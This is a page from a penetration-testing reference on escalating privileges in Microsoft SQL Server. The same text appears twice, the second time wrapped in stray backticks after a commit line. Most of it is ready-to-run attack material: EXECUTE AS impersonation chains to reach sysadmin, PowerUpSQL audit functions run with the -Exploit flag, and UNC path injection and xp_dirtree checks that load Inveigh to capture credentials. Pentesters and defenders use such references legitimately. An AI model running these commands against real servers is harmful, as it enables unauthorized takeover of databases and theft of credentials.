InternalAllTheThings/docs/databases/mssql-audit-checks.md

# MSSQL - Audit Checks

## Summary

* [Find and exploit impersonation opportunities ](#find-and-exploit-impersonation-opportunities)
* [Find SQL Server Logins Which can be Impersonated for the Current Database](#find-sql-server-logins-which-can-be-impersonated-for-the-current-database)
* [Find databases that have been configured as trustworthy](#find-databases-that-have-been-configured-as-trustworthy)


## Find and exploit impersonation opportunities

* Impersonate as: `EXECUTE AS LOGIN = 'sa'`
* Impersonate `dbo` with DB_OWNER
	```sql
	SQL> select is_member('db_owner');
	SQL> execute as user = 'dbo'
	SQL> SELECT is_srvrolemember('sysadmin')
	```

```ps1
Invoke-SQLAuditPrivImpersonateLogin -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Exploit -Verbose

# impersonate sa account
powerpick Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "EXECUTE AS LOGIN = 'sa'; SELECT IS_SRVROLEMEMBER(''sysadmin'')" -Verbose -Debug
```

### Exploiting Impersonation

```sql
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
EXECUTE AS LOGIN = 'adminuser'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
SELECT ORIGINAL_LOGIN()
```

### Exploiting Nested Impersonation

```sql
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
EXECUTE AS LOGIN = 'stduser'
SELECT SYSTEM_USER
EXECUTE AS LOGIN = 'sa'
SELECT IS_SRVROLEMEMBER('sysadmin')
SELECT ORIGINAL_LOGIN()
SELECT SYSTEM_USER
```


## Find SQL Server Logins Which can be Impersonated for the Current Database

```sql
select distinct b.name
from sys.server_permissions a
inner join sys.server_principals b
on a.grantor_principal_id = b.principal_id
where a.permission_name = 'impersonate'
```


## Find databases that have been configured as trustworthy

```sql
Invoke-SQLAuditPrivTrustworthy -Instance "<DBSERVERNAME\DBInstance>" -Exploit -Verbose 

SELECT name as database_name, SUSER_NAME(owner_sid) AS database_owner, is_trustworthy_on AS TRUSTWORTHY from sys.databases
```

> The following audit checks run web requests to load Inveigh via reflection. Be mindful of the environment and ability to connect outbound.

```ps1
Invoke-SQLAuditPrivXpDirtree
Invoke-SQLUncPathInjection
Invoke-SQLAuditPrivXpFileexist
```
MSSQL databases rework 2024-09-18 12:04:03 +00:00			`# MSSQL - Audit Checks`

			`## Summary`

			`* [Find and exploit impersonation opportunities ](#find-and-exploit-impersonation-opportunities)`
			`* [Find SQL Server Logins Which can be Impersonated for the Current Database](#find-sql-server-logins-which-can-be-impersonated-for-the-current-database)`
			`* [Find databases that have been configured as trustworthy](#find-databases-that-have-been-configured-as-trustworthy)`


			`## Find and exploit impersonation opportunities`

			* Impersonate as: `EXECUTE AS LOGIN = 'sa'`
			* Impersonate `dbo` with DB_OWNER
			```sql
			`SQL> select is_member('db_owner');`
			`SQL> execute as user = 'dbo'`
			`SQL> SELECT is_srvrolemember('sysadmin')`
			```

			```ps1
			`Invoke-SQLAuditPrivImpersonateLogin -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Exploit -Verbose`

			`# impersonate sa account`
			`powerpick Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "EXECUTE AS LOGIN = 'sa'; SELECT IS_SRVROLEMEMBER(''sysadmin'')" -Verbose -Debug`
			```

			`### Exploiting Impersonation`

			```sql
			`SELECT SYSTEM_USER`
			`SELECT IS_SRVROLEMEMBER('sysadmin')`
			`EXECUTE AS LOGIN = 'adminuser'`
			`SELECT SYSTEM_USER`
			`SELECT IS_SRVROLEMEMBER('sysadmin')`
			`SELECT ORIGINAL_LOGIN()`
			```

			`### Exploiting Nested Impersonation`

			```sql
			`SELECT SYSTEM_USER`
			`SELECT IS_SRVROLEMEMBER('sysadmin')`
			`EXECUTE AS LOGIN = 'stduser'`
			`SELECT SYSTEM_USER`
			`EXECUTE AS LOGIN = 'sa'`
			`SELECT IS_SRVROLEMEMBER('sysadmin')`
			`SELECT ORIGINAL_LOGIN()`
			`SELECT SYSTEM_USER`
			```


			`## Find SQL Server Logins Which can be Impersonated for the Current Database`

			```sql
			`select distinct b.name`
			`from sys.server_permissions a`
			`inner join sys.server_principals b`
			`on a.grantor_principal_id = b.principal_id`
			`where a.permission_name = 'impersonate'`
			```


			`## Find databases that have been configured as trustworthy`

			```sql
			`Invoke-SQLAuditPrivTrustworthy -Instance "<DBSERVERNAME\DBInstance>" -Exploit -Verbose`

			`SELECT name as database_name, SUSER_NAME(owner_sid) AS database_owner, is_trustworthy_on AS TRUSTWORTHY from sys.databases`
			```

			`> The following audit checks run web requests to load Inveigh via reflection. Be mindful of the environment and ability to connect outbound.`

			```ps1
			`Invoke-SQLAuditPrivXpDirtree`
			`Invoke-SQLUncPathInjection`
			`Invoke-SQLAuditPrivXpFileexist`
			```